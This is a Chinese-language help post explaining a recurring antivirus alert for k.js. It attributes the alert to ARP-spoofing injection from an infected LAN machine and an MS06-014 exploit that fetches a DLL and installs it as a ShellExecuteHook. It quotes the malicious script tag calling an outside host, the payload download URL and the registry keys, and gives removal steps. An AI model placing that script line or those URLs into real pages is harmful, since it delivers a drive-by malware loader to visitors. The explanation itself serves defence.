腳本病毒：Trojan.DL.VBS.Agent.cpb （文件名為k[1].js)老是在internet臨時文件里出現(xiàn)，瑞星監(jiān)控殺了又來，如此反復(fù)著！我試圖清空臨時文件，但一上網(wǎng)打開網(wǎng)頁（不管是哪些網(wǎng)頁），那個k[1].js又會被瑞星監(jiān)控到。這是怎么回事呀？是誤報嗎？

　　該網(wǎng)頁利用MS06-014漏洞，下載http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接寫入注冊表


Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}指向C:\WINDOWS\winhelp.dll


　　由于瑞星查殺了k.js，一般情況下大家是不會中毒的。但是之所以重復(fù)出現(xiàn)k.js的報毒，原因是：

　　局域網(wǎng)中有電腦中了此毒，然后向局域網(wǎng)中其他電腦發(fā)動ARP攻擊，將其他用戶接收到的網(wǎng)絡(luò)數(shù)據(jù)包中加入


Code:
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>


的代碼，導(dǎo)致其他用戶訪問任何網(wǎng)站時都會報毒。

　　所以，首先，確認你的電腦是否中毒：

　　確認以下注冊表路徑是否存在：


Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]


　　如果存在，嘗試在安全模式下刪除這兩個注冊表路徑。

　　如果不存在，說明不是你本機的中毒問題，而是你受到ARP攻擊的緣故。

　　這種情況下，請聯(lián)系局域網(wǎng)網(wǎng)管進行協(xié)調(diào)處理。必須找到中毒并進行ARP欺騙的電腦，然后將其斷網(wǎng)查毒。

最新評論